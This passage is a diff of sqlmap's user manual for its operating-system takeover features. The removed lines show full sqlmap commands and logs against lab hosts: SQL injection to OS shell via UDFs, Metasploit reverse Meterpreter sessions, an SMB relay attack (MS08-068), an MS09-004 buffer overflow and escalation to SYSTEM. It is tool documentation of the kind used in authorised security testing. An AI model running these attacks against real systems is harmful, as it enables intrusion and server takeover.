-command standard output:    'nt authority\system'
-
-os-shell> [TAB TAB]
-copy         del          dir          echo         md           mem          move         
-net          netstat -na  ver          whoami       xcopy        
-
-os-shell> exit
-[hh:mm:51] [INFO] cleaning up the database management system
-[hh:mm:51] [DEBUG] removing support tables
-[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapoutput
-do you want to remove sys_exec UDF? [Y/n] n
-do you want to remove sys_eval UDF? [Y/n] n
-[hh:mm:04] [INFO] database management system cleanup finished
-[hh:mm:04] [WARNING] remember that UDF dynamic-link library files saved on the file system 
-can only be deleted manually
-</verb></tscreen>
+<sect2>Out-of-band stateful connection: Meterpreter & friends
 
 <p>
-Now run it again, but specifying the <tt>-</tt><tt>-union-use</tt> to retrieve the
-command standard output quicker, via UNION based SQL injection, when the
-parameter is affected also by inband SQL injection vulnerability:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" \
-  --os-shell -v 2 --union-use
-
-[...]
-[hh:mm:16] [INFO] the back-end DBMS is MySQL
-web server operating system: Windows 2003 or 2008
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:16] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-technique
-[hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id'
-[hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection 
-vulnerability
-valid union:    'http://192.168.136.131/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT 
-NULL, NULL, NULL# AND 528=528'
-
-[hh:mm:16] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:16] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:16] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),
-MID((VERSION()), 1, 6),CHAR(117,114,115,75,117,102)), NULL# AND 3173=3173
-[hh:mm:16] [DEBUG] performed 1 queries in 0 seconds
-[hh:mm:16] [DEBUG] query: SELECT SLEEP(5)
-[hh:mm:21] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:21] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
-[hh:mm:21] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
-[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),
-MID(@@datadir, 1, 1),CHAR(117,114,115,75,117,102)), NULL# AND 6574=6574
-[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
-[hh:mm:21] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:21] [DEBUG] cleaning up the database management system
-[hh:mm:21] [DEBUG] removing support tables
-[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:21] [INFO] testing if current user is DBA
-[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE 
-WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 
-1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# AND 19=19
-[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
-[hh:mm:21] [INFO] checking if sys_exec UDF already exist
-[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN 
-((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=
-CHAR(115,121,115,95,101,120,101,99)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# 
-AND 4900=4900
-[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
-sys_exec UDF already exists, do you want to overwrite it? [y/N] n
-[hh:mm:24] [INFO] checking if sys_eval UDF already exist
-[hh:mm:24] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN 
-((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=
-CHAR(115,121,115,95,101,118,97,108)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# 
-AND 4437=4437
-[hh:mm:24] [DEBUG] performed 1 queries in 0 seconds
-sys_eval UDF already exists, do you want to overwrite it? [y/N] n
-[hh:mm:25] [DEBUG] keeping existing sys_exec UDF as requested
-[hh:mm:25] [DEBUG] keeping existing sys_eval UDF as requested
-[hh:mm:25] [DEBUG] creating a support table to write commands standard output to
-[hh:mm:25] [DEBUG] query: DROP TABLE sqlmapoutput
-[hh:mm:25] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext)
-[hh:mm:25] [INFO] going to use injected sys_eval and sys_exec user-defined functions for 
-operating system command execution
-[hh:mm:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
-os-shell> ipconfig
-do you want to retrieve the command standard output? [Y/n] 
-[hh:mm:29] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('ipconfig'))
-[hh:mm:29] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),IFNULL(CAST
-(data AS CHAR(10000)), CHAR(32)),CHAR(117,114,115,75,117,102)), NULL FROM sqlmapoutput# AND 
-7106=7106
-[hh:mm:29] [DEBUG] performed 1 queries in 0 seconds
-[hh:mm:29] [DEBUG] query: DELETE FROM sqlmapoutput
-command standard output:
----
-
-Windows IP Configuration
-
-
-Ethernet adapter Local Area Connection 2:
-
-   Connection-specific DNS Suffix  . : localdomain
-   IP Address. . . . . . . . . . . . : 192.168.136.131
-   Subnet Mask . . . . . . . . . . . : 255.255.255.0
----Default Gateway . . . . . . . . . : 192.168.136.1
-
-os-shell> exit
-[hh:mm:41] [INFO] cleaning up the database management system
-[hh:mm:41] [DEBUG] removing support tables
-[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapoutput
-do you want to remove sys_exec UDF? [Y/n] n
-do you want to remove sys_eval UDF? [Y/n] n
-[hh:mm:54] [INFO] database management system cleanup finished
-[hh:mm:54] [WARNING] remember that UDF dynamic-link library files saved on the file system 
-can only be deleted manually
-</verb></tscreen>
-
-<p>
-As you can see from this second example, sqlmap firstly check if the two
-user-defined functions are already created, if so, it asks the user if he
-wants to recreate them or keep them and save time.
-
-
-<sect2>Prompt for an out-of-band shell, Meterpreter or VNC
-
-<p>
-Switches: <tt>-</tt><tt>-os-pwn</tt>, <tt>-</tt><tt>-priv-esc</tt>, <tt>-</tt><tt>-msf-path</tt> and <tt>-</tt><tt>-tmp-path</tt>
+Switches: <tt>-</tt><tt>-os-pwn</tt>, <tt>-</tt><tt>-os-smbrelay</tt>,
+<tt>-</tt><tt>-os-bof</tt>, <tt>-</tt><tt>-priv-esc</tt>,
+<tt>-</tt><tt>-msf-path</tt> and <tt>-</tt><tt>-tmp-path</tt>
 
 <p>
 It is possible to establish an <bf>out-of-band stateful TCP connection
-between the user machine and the database server</bf> underlying operating
-system. This channel can be an interactive command prompt, a Meterpreter
-session or a graphical user interface (VNC) session as per user's choice.
+between the attacker machine and the database server</bf> underlying
+operating system when the back-end database management system is either
+MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the
+needed privileges to abuse database specific functionalities and
+architectural weaknesses.
+This channel can be an interactive command prompt, a Meterpreter session
+or a graphical user interface (VNC) session as per user's choice.
+
+<p>
 sqlmap relies on Metasploit to create the shellcode and implements four
 different techniques to execute it on the database server. These
 techniques are:
 <itemize>
 <item>Database <bf>in-memory execution of the Metasploit's shellcode</bf>
 via sqlmap own user-defined function <tt>sys_bineval()</tt>. Supported on
-MySQL and PostgreSQL.
+MySQL and PostgreSQL - switch <tt>-</tt><tt>-os-pwn</tt>.
 <item>Upload and execution of a Metasploit's <bf>stand-alone payload
 stager</bf> via sqlmap own user-defined function <tt>sys_exec()</tt> on
 MySQL and PostgreSQL or via <tt>xp_cmdshell()</tt> on Microsoft SQL
-Server.
+Server - switch <tt>-</tt><tt>-os-pwn</tt>.
 <item>Execution of Metasploit's shellcode by performing a <bf>SMB
 reflection attack</bf> (<htmlurl
 url="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx"
 name="MS08-068">) with a UNC path request from the database server to
-the user's machine where the Metasploit <tt>smb_relay</tt> server exploit
-runs.
+the attacker's machine where the Metasploit <tt>smb_relay</tt> server
+exploit listens. Supported when running sqlmap with high privileges
+(<tt>uid=0</tt>) on Linux/Unix and the target DBMS runs as Administrator
+on Windows - switch <tt>-</tt><tt>-os-smbrelay</tt>.
 <item>Database in-memory execution of the Metasploit's shellcode by
 exploiting <bf>Microsoft SQL Server 2000 and 2005
 <tt>sp_replwritetovarbin</tt> stored procedure heap-based buffer
 overflow</bf> (<htmlurl
 url="http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx"
-name="MS09-004">) with automatic DEP bypass.
+name="MS09-004">). sqlmap has its own exploit to trigger the
+vulnerability with automatic DEP memory protection bypass, but it relies
+on Metasploit to generate the shellcode to get executed upon successful
+exploitation - switch <tt>-</tt><tt>-os-bof</tt>.
 </itemize>
 
-<p>
-Note that this feature is not supported by sqlmap running on Windows
-because it relies on Metasploit's <tt>msfcli</tt> which is not
-available for Windows.
-
 <p>
 These techniques are detailed in the white paper
-<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf"
+<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
 name="Advanced SQL injection to operating system full control"> and in the
 slide deck <htmlurl url="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database"
 name="Expanding the control over the operating system from the database">.
 
 <p>
-Example on a <bf>MySQL 5.1</bf> target:
+Example against a MySQL target:
 
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \
-  --os-pwn -v 1 --msf-path /home/inquis/software/metasploit
+  --os-pwn -v 1 --msf-path /tmp/metasploit
 
 [...]
-web server operating system: Windows 2003 or 2008
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:09] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:09] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:09] [INFO] retrieved: 5.1.30
-[hh:mm:18] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:18] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:18] [INFO] retrieved: C
-[hh:mm:19] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:19] [INFO] testing if current user is DBA
-[hh:mm:19] [INFO] retrieved: 1
-[hh:mm:20] [INFO] checking if UDF 'sys_bineval' already exist
-[hh:mm:20] [INFO] retrieved: 0
-[hh:mm:21] [INFO] checking if UDF 'sys_exec' already exist
-[hh:mm:21] [INFO] retrieved: 0
-[hh:mm:21] [INFO] retrieving MySQL base directory absolute path
-[hh:mm:21] [INFO] retrieved: C:\Program Files\MySQL\MySQL Server 5.1\
-[hh:mm:46] [WARNING] this will only work if the database administrator created manually 
-the 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin' subfolder
-[hh:mm:47] [INFO] creating UDF 'sys_bineval' from the binary UDF file
-[hh:mm:47] [INFO] creating UDF 'sys_exec' from the binary UDF file
-how do you want to execute the Metasploit shellcode on the back-end database underlying 
-operating system?
-[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
-[2] Stand-alone payload stager (file system way)
-> 1
-[hh:mm:51] [INFO] creating Metasploit Framework 3 multi-stage shellcode 
-which connection type do you want to use?
-[1] Reverse TCP: Connect back from the database host to this machine (default)
-[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
-between the specified and 65535
-[3] Bind TCP: Listen on the database host for a connection
-> 1
-which is the local address? [192.168.136.1] 
-which local port number do you want to use? [47776] 
-which payload do you want to use?
-[1] Meterpreter (default)
-[2] Shell
-[3] VNC
-> 1
-[hh:mm:55] [INFO] creation in progress .............................................. done
-[hh:mm:41] [INFO] running Metasploit Framework 3 command line interface locally, wait..
-[*] Please wait while we load the module tree...
-[*] Started reverse handler on 192.168.136.1:47776 
-[*] Starting the payload handler...
-[hh:mm:22] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval', wait..
-[*] Sending stage (748032 bytes)
-[*] Meterpreter session 1 opened (192.168.136.1:47776 -> 192.168.136.128:2176)
-
-meterpreter > Loading extension espia...success.
-meterpreter > Loading extension incognito...success.
-meterpreter > Loading extension priv...success.
-meterpreter > Loading extension sniffer...success.
-meterpreter > Computer: W2K3DEV
-OS      : Windows .NET Server (Build 3790, Service Pack 2).
-Arch    : x86
-Language: en_US
-meterpreter > Server username: NT AUTHORITY\SYSTEM
-meterpreter > ipconfig
-
-MS TCP Loopback interface
-Hardware MAC: 00:00:00:00:00:00
-IP Address  : 127.0.0.1
-Netmask     : 255.0.0.0
-
-
-
-VMware Accelerated AMD PCNet Adapter #2
-Hardware MAC: 00:0c:29:86:69:1b
-IP Address  : 192.168.136.128
-Netmask     : 255.255.255.0
-
-
-meterpreter > exit
-
-[hh:mm:52] [INFO] cleaning up the database management system
-do you want to remove UDF 'sys_bineval'? [Y/n] 
-do you want to remove UDF 'sys_exec'? [Y/n] 
-[hh:mm:54] [INFO] database management system cleanup finished
-[hh:mm:54] [WARNING] remember that UDF dynamic-link library files and Metasploit related 
-files in the temporary folder saved on the file system can only be deleted manually
+TODO
 </verb></tscreen>
 
 <p>
@@ -4585,408 +2560,24 @@ Microsoft SQL Server 2000 by default runs as <tt>SYSTEM</tt>, whereas
 Microsoft SQL Server 2005 and 2008 run most of the times as <tt>NETWORK
 SERVICE</tt> and sometimes as <tt>LOCAL SERVICE</tt>.
 
+<p>
 It is possible to provide sqlmap with the <tt>-</tt><tt>-priv-esc</tt>
-option to perform a <bf>database process' user privilege escalation</bf>
+switch to perform a <bf>database process' user privilege escalation</bf>
 via Metasploit's <tt>getsystem</tt> command which include, among others,
 the <htmlurl
 url="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html"
 name="kitrap0d"> technique (<htmlurl
 url="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx"
-name="MS10-015">) or via <htmlurl
-url="http://www.argeniss.com/research/TokenKidnapping.pdf"
-name="Windows Access Tokens kidnapping"> by using Meterpreter's
-<htmlurl url="http://sourceforge.net/projects/incognito/"
-name="incognito"> extension.
-
-<p>
-Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> running as
-<tt>NETWORK SERVICE</tt> on the target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mssql/iis/get_int.asp?id=1" \
-  --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc
-
-[...]
-web server operating system: Windows 2000
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:47] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:52] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:52] [INFO] testing if current user is DBA
-[hh:mm:52] [INFO] retrieved: 1
-[hh:mm:52] [INFO] checking if xp_cmdshell extended procedure is available, wait..
-[hh:mm:01] [INFO] xp_cmdshell extended procedure is available
-[hh:mm:01] [INFO] creating Metasploit Framework 3 payload stager
-which connection type do you want to use?
-[1] Reverse TCP: Connect back from the database host to this machine (default)
-[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
-between the specified and 65535
-[3] Bind TCP: Listen on the database host for a connection
-> 1
-which is the local address? [192.168.136.1] 
-which local port number do you want to use? [44780] 
-[hh:mm:52] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
-that can be used to escalate privileges, either via 'incognito' extension or via 
-'getsystem' command
-which payload encoding do you want to use?
-[1] No Encoder
-[2] Alpha2 Alphanumeric Mixedcase Encoder
-[3] Alpha2 Alphanumeric Uppercase Encoder
-[4] Avoid UTF8/tolower
-[5] Call+4 Dword XOR Encoder
-[6] Single-byte XOR Countdown Encoder
-[7] Variable-length Fnstenv/mov Dword XOR Encoder
-[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
-[9] Non-Alpha Encoder
-[10] Non-Upper Encoder
-[11] Polymorphic XOR Additive Feedback Encoder (default)
-[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
-[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
-> 
-[hh:mm:53] [INFO] creation in progress ..... done
-[hh:mm:58] [INFO] compression in progress . done
-[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe'
-[hh:mm:05] [INFO] running Metasploit Framework 3 command line interface locally, wait..
-[*] Please wait while we load the module tree...
-[*] Started reverse handler on 192.168.136.1:44780 
-[*] Starting the payload handler...
-[hh:mm:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
-[*] Sending stage (748032 bytes)
-[*] Meterpreter session 1 opened (192.168.136.1:44780 -> 192.168.136.128:2185)
-
-meterpreter > 
-[hh:mm:34] [INFO] trying to escalate privileges using Meterpreter 'getsystem' command which 
-tries different techniques, including kitrap0d
-[hh:mm:34] [INFO] displaying the list of Access Tokens availables. Choose which user you 
-want to impersonate by using incognito's command 'impersonate_token' if 'getsystem' did not 
-success to elevate privileges
-Loading extension espia...success.
-meterpreter > Loading extension incognito...success.
-meterpreter > Loading extension priv...success.
-meterpreter > Loading extension sniffer...success.
-meterpreter > Computer: W2K3DEV
-OS      : Windows .NET Server (Build 3790, Service Pack 2).
-Arch    : x86
-Language: en_US
-meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE
-meterpreter > ...got system (via technique 4).
-meterpreter > 
-Delegation Tokens Available
-========================================
-NT AUTHORITY\LOCAL SERVICE
-NT AUTHORITY\NETWORK SERVICE
-NT AUTHORITY\SYSTEM
-W2K3DEV\Administrator
-W2K3DEV\IUSR_W2K3STENSP0
-W2K3DEV\postgres
-
-Impersonation Tokens Available
-========================================
-NT AUTHORITY\ANONYMOUS LOGON
-
-meterpreter > Server username: NT AUTHORITY\SYSTEM
-meterpreter > ipconfig
-
-MS TCP Loopback interface
-Hardware MAC: 00:00:00:00:00:00
-IP Address  : 127.0.0.1
-Netmask     : 255.0.0.0
-
-
-
-VMware Accelerated AMD PCNet Adapter #2
-Hardware MAC: 00:0c:29:86:69:1b
-IP Address  : 192.168.136.128
-Netmask     : 255.255.255.0
-
-
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > exit
-
-[hh:mm:52] [INFO] cleaning up the database management system
-</verb></tscreen>
-
-
-<sect2>One click prompt for an out-of-band shell, meterpreter or VNC
-
-<p>
-Switches: <tt>-</tt><tt>-os-smbrelay</tt>, <tt>-</tt><tt>-priv-esc</tt> and <tt>-</tt><tt>-msf-path</tt>
-
-<p>
-If the back-end database management system runs on Windows as
-<tt>Administrator</tt> and the system is not patched against Microsoft
-Security Bulletin <htmlurl url="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx"
-name="MS08-068">, sqlmap can abuse the universal naming convention (UNC)
-feature within any database management system to force the database server
-to initiate a SMB connection with the attacker host, then perform a SMB
-authentication relay attack in order to establish a high-privileged
-<bf>out-of-band TCP stateful channel</bf> between the attacker host and
-the target database server.
-sqlmap relies on <htmlurl url="http://www.metasploit.com/framework/"
-name="Metasploit">'s SMB relay exploit to perform this attack.
-You need to run sqlmap as a privileged user (e.g. <bf>root</bf>) if you
-want to perform a SMB relay attack because it will need to listen on a
-user-specified SMB TCP port for incoming connection attempts.
-
-<p>
-Note that this feature is not supported by sqlmap running on Windows
-platform because it relies on Metasploit's <tt>msfpayload</tt> which is
-not fully working on Windows.
-
-<p>
-This technique is detailed in the white paper
-<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf"
-name="Advanced SQL injection to operating system full control">.
-
-<p>
-Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> running as
-<tt>Administrator</tt> on the target:
-
-<tscreen><verb>
-$ sudo python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
-  --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit
-
-[...]
-[hh:mm:11] [INFO] the back-end DBMS is Microsoft SQL Server
-web server operating system: Windows 2000
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:11] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:16] [INFO] the web application supports stacked queries on parameter 'name'
-[hh:mm:16] [WARNING] it is unlikely that this attack will be successful because often 
-Microsoft SQL Server 2005 runs as Network Service which is not a real user, it does not 
-send the NTLM session hash when connecting to a SMB service
-[hh:mm:16] [INFO] which connection type do you want to use?
-[1] Bind TCP (default)
-[2] Bind TCP (No NX)
-[3] Reverse TCP
-[4] Reverse TCP (No NX)
-> 1
-[hh:mm:16] [INFO] which is the local address? [192.168.136.161] 192.168.136.161
-[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.136.131] 192.168.136.131
-[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
-[hh:mm:16] [INFO] which payload do you want to use?
-[1] Meterpreter (default)
-[2] Shell
-[3] VNC
-> 1
-[hh:mm:16] [INFO] which SMB port do you want to use?
-[1] 139/TCP (default)
-[2] 445/TCP
-> 1
-[hh:mm:16] [INFO] running Metasploit Framework 3 console locally, wait..
-
-                _                  _       _ _
-               | |                | |     (_) |
- _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
-| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
-| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
-|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
-                            | |
-                            |_|
-
-
-       =[ msf v3.3-dev
-+ -- --=[ 392 exploits - 234 payloads
-+ -- --=[ 20 encoders - 7 nops
-       =[ 168 aux
-
-resource> use windows/smb/smb_relay
-resource> set SRVHOST 192.168.136.161
-SRVHOST => 192.168.136.161
-resource> set SRVPORT 139
-SRVPORT => 139
-resource> set PAYLOAD windows/meterpreter/bind_tcp
-PAYLOAD => windows/meterpreter/bind_tcp
-resource> set LPORT 4907
-LPORT => 4907
-resource> set RHOST 192.168.136.131
-RHOST => 192.168.136.131
-resource> exploit
-[*] Exploit running as background job.
-msf exploit(smb_relay) > 
-[*] Started bind handler
-[*] Server started.
-[*] Received 192.168.136.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
-Service Pack 2 LM:
-[*] Sending Access Denied to 192.168.136.131:3242 \
-[*] Received 192.168.136.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
-Server 2003 3790 Service Pack 2 LM:
-[*] Authenticating to 192.168.136.131 as W2K3DEV\Administrator...
-[*] AUTHENTICATED as W2K3DEV\Administrator...
-[*] Connecting to the ADMIN$ share...
-[*] Regenerating the payload...
-[*] Uploading payload...
-[*] Created \wELRmcmd.exe...
-[*] Connecting to the Service Control Manager...
-[*] Obtaining a service manager handle...
-[*] Creating a new service...
-[*] Closing service handle...
-[*] Opening service...
-[*] Starting the service...
-[*] Removing the service...
-[*] Closing service handle...
-[*] Deleting \wELRmcmd.exe...
-[*] Sending Access Denied to 192.168.136.131:3242 W2K3DEV\Administrator
-[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
-[*] Received 192.168.136.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
-Service Pack 2 LM:
-[*] Sending Access Denied to 192.168.136.131:3244 \
-[*] Received 192.168.136.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
-Server 2003 3790 Service Pack 2 LM:
-[*] Authenticating to 192.168.136.131 as W2K3DEV\Administrator...
-[*] AUTHENTICATED as W2K3DEV\Administrator...
-[*] Ignoring request from 192.168.136.131, attack already in progress.
-[*] Sending Access Denied to 192.168.136.131:3244 W2K3DEV\Administrator
-[*] Sending stage (718336 bytes)
-[*] Meterpreter session 1 opened (192.168.136.161:51813 -> 192.168.136.131:4907)
-
-Active sessions
-===============
-
-  Id  Description  Tunnel                                       
-  --  -----------  ------                                       
-  1   Meterpreter  192.168.136.161:51813 -> 192.168.136.131:4907  
-
-msf exploit(smb_relay) > [*] Starting interaction with 1...
-
-meterpreter > [-] The 'priv' extension has already been loaded.
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > exit
-
-[*] Meterpreter session 1 closed.
-msf exploit(smb_relay) > exit
-
-[*] Server stopped.
-</verb></tscreen>
-
-
-<sect2>Database stored procedure heap-based buffer overflow exploit
-
-<p>
-Switches: <tt>-</tt><tt>-os-bof</tt>, <tt>-</tt><tt>-priv-esc</tt> and <tt>-</tt><tt>-msf-path</tt>
-
-<p>
-If the back-end database management system is Microsoft SQL Server not
-patched against Microsoft Security Bulletin
-<htmlurl url="http://www.microsoft.com/technet/security/Bulletin/MS09-004.mspx"
-name="MS09-004">, sqlmap can exploit the heap-based buffer overflow
-affecting <tt>sp_replwritetovarbin</tt> stored procedure in order to
-establish an <bf>out-of-band TCP stateful channel</bf> between the
-attacker host and the target database server.
-sqlmap has its own exploit to trigger the vulnerability, but it relies on
-<htmlurl url="http://www.metasploit.com/framework/" name="Metasploit"> to
-generate the shellcode used within the exploit.
-
-<p>
-Note that this feature is not supported by sqlmap running on Windows
-platform because it relies on Metasploit's <tt>msfcli</tt> which is not
-available for Windows.
-
-<p>
-This technique is detailed in the white paper
-<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf"
-name="Advanced SQL injection to operating system full control"> and in the
-slide deck <htmlurl url="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database"
-name="Expanding the control over the operating system from the database">.
-
-<p>
-Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u http://192.168.136.128/sqlmap/mssql/iis/get_int.asp?id=1 \
-  --os-bof -v 1 --msf-path ~/software/metasploit
-
-[...]
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:51] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:56] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:56] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
-stored procedure heap-based buffer overflow (MS09-004)
-[hh:mm:56] [INFO] fingerprinting the back-end DBMS operating system version and service pack
-[hh:mm:56] [INFO] retrieved: 1
-[hh:mm:58] [INFO] retrieved: 1
-[hh:mm:58] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
-[hh:mm:58] [INFO] creating Metasploit Framework 3 multi-stage shellcode 
-which connection type do you want to use?
-[1] Reverse TCP: Connect back from the database host to this machine (default)
-[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
-between the specified and 65535
-[3] Bind TCP: Listen on the database host for a connection
-> 
-which is the local address? [192.168.136.1] 
-which local port number do you want to use? [21380] 
-which payload do you want to use?
-[1] Meterpreter (default)
-[2] Shell
-[3] VNC
-> 
-which payload encoding do you want to use?
-[1] No Encoder
-[2] Alpha2 Alphanumeric Mixedcase Encoder
-[3] Alpha2 Alphanumeric Uppercase Encoder
-[4] Avoid UTF8/tolower
-[5] Call+4 Dword XOR Encoder
-[6] Single-byte XOR Countdown Encoder
-[7] Variable-length Fnstenv/mov Dword XOR Encoder
-[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
-[9] Non-Alpha Encoder
-[10] Non-Upper Encoder
-[11] Polymorphic XOR Additive Feedback Encoder (default)
-[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
-[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
-> 
-[hh:mm:16] [INFO] creation in progress .... done
-[hh:mm:20] [INFO] running Metasploit Framework 3 command line interface locally, wait..
-[*] Please wait while we load the module tree...
-[*] Started reverse handler on 192.168.136.1:21380 
-[*] Starting the payload handler...
-[hh:mm:27] [INFO] triggering the buffer overflow vulnerability, wait..
-[*] Sending stage (748032 bytes)
-[*] Meterpreter session 1 opened (192.168.136.1:21380 -> 192.168.136.128:12062)
-
-meterpreter > Loading extension espia...success.
-meterpreter > Loading extension incognito...success.
-meterpreter > Loading extension priv...success.
-meterpreter > Loading extension sniffer...success.
-meterpreter > Computer: W2K3DEV
-OS      : Windows .NET Server (Build 3790, Service Pack 2).
-Arch    : x86
-Language: en_US
-meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE
-meterpreter > ipconfig
-
-MS TCP Loopback interface
-Hardware MAC: 00:00:00:00:00:00
-IP Address  : 127.0.0.1
-Netmask     : 255.0.0.0
-
-
-
-VMware Accelerated AMD PCNet Adapter #2
-Hardware MAC: 00:0c:29:86:69:1b
-IP Address  : 192.168.136.128
-Netmask     : 255.255.255.0
-
-
-meterpreter > exit
-</verb></tscreen>
+name="MS10-015">).
 
 
 <sect1>Windows registry access
 
 <p>
-It is possible to access Windows registry when the back-end 
-database management system is either MySQL, PostgreSQL or 
